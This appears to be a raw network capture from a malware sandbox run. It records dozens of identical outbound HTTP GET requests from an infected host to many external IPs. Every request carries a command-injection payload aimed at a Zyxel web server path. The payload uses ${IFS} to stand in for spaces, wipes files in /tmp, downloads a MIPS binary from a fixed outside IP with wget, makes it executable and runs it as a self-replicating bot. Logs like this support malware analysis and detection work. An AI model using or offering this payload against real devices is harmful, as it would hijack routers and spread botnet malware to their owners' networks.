                                          Jan 14, 2024 15:46:22.116836071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5835192.168.2.2339514192.65.243.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116858006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5836192.168.2.235776646.178.17.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116887093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5837192.168.2.235954297.217.163.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116909027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5838192.168.2.234903244.94.160.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116955996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5839192.168.2.2336654207.156.242.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116976976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5840192.168.2.2333318165.215.112.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117023945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5841192.168.2.2356534221.123.78.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117053986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5842192.168.2.2349250134.50.179.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117069006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5843192.168.2.2347782131.158.133.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117083073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5844192.168.2.233604042.199.169.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117136955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5845192.168.2.234171240.5.187.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117160082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5846192.168.2.233609449.213.190.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117187977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5847192.168.2.234190268.213.218.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117224932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5848192.168.2.2350812159.97.53.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117259026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5849192.168.2.2334204159.27.35.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117299080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5850192.168.2.235866277.248.226.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117326021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5851192.168.2.2344154223.144.49.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117341995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5852192.168.2.2346996170.128.146.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117377043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5853192.168.2.235563843.238.42.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117377996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5854192.168.2.235393012.129.178.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117422104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5855192.168.2.233595861.33.231.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117441893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5856192.168.2.2338878134.238.178.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117460966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5857192.168.2.2334716104.9.54.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117480993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5858192.168.2.2349190221.244.96.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117503881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5859192.168.2.235519819.123.241.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117563009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5860192.168.2.233469073.233.140.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117577076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5861192.168.2.2355018187.98.18.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117603064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5862192.168.2.234912236.164.150.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117613077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5863192.168.2.2342796165.183.154.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117650032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5864192.168.2.236089238.250.209.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117669106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5865192.168.2.2358376105.163.203.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117708921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5866192.168.2.23462405.45.234.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117739916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5867192.168.2.2347256177.42.48.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.117753983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5868192.168.2.233646845.146.13.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.120409012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5869192.168.2.2341530193.51.238.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127398968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5870192.168.2.235916259.34.37.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127418041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5871192.168.2.2337334199.198.233.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127435923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5872192.168.2.2339766146.38.43.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127456903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5873192.168.2.2345748196.179.209.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127499104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5874192.168.2.234405643.109.4.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127528906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5875192.168.2.2343552139.33.52.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127554893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5876192.168.2.234522291.206.93.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127593994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5877192.168.2.235789470.210.64.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127628088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5878192.168.2.2337102218.73.30.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127670050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5879192.168.2.2348370132.129.112.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127688885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5880192.168.2.234155657.25.165.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127716064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5881192.168.2.2338902192.121.24.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127764940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5882192.168.2.234374013.129.232.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127778053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5883192.168.2.233474088.97.66.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127813101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5884192.168.2.2345032119.1.49.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127837896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5885192.168.2.234976220.252.62.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127872944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5886192.168.2.2334478181.113.183.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127899885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5887192.168.2.2347912201.50.30.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127907991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5888192.168.2.2335176196.178.195.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127943039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5889192.168.2.233966064.50.241.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127980947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5890192.168.2.2335824192.210.90.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.127980947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5891192.168.2.2352020134.233.241.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128015995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5892192.168.2.2344668138.13.214.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128061056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5893192.168.2.2358784115.246.84.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128081083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5894192.168.2.2338008174.162.191.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128096104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5895192.168.2.233621296.182.24.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128134012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5896192.168.2.2338752181.185.146.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.128158092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5897192.168.2.234908236.70.88.0443
                                          TimestampBytes transferredDirectionData
